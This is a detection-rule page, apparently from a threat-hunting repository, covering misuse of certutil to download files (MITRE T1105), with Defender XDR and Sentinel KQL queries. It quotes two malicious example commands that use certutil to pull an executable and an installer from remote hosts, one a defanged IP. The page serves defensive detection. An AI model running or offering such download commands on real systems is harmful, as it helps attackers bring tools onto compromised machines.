Skip to content

Latest commit

 

History

History
40 lines (32 loc) · 1.56 KB

File metadata and controls

40 lines (32 loc) · 1.56 KB

Certutil Remote Download

Query Information

MITRE ATT&CK Technique(s)

Technique ID Title Link
T1105 Ingress Tool Transfer https://attack.mitre.org/techniques/T1105/

Description

Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols. The living of the land binary certutil is know to be misused by adversaries to remotely collect malicious tools.

Malicious Examples (Sources, see references):

certutil.exe -urlcache -split -f http://7-zip.org/a/7z1604-x64.exe 7zip.exe
certutil  -urlcache -f http[:]//23.26.137[.]225:8084/msappdata.msi c:\mpyutd.msi

Risk

An adversary transfered tools to the local device for execution.

References

Defender XDR

DeviceProcessEvents
| where FileName == "certutil.exe"
| where tolower(ProcessCommandLine) has_all ("http", "urlcache", "-f")
| project-reorder Timestamp, ProcessCommandLine, FileName, InitiatingProcessAccountUpn

Sentinel

DeviceProcessEvents
| where FileName == "certutil.exe"
| where tolower(ProcessCommandLine) has_all ("http", "urlcache", "-f")
| project-reorder TimeGenerated, ProcessCommandLine, FileName, InitiatingProcessAccountUpn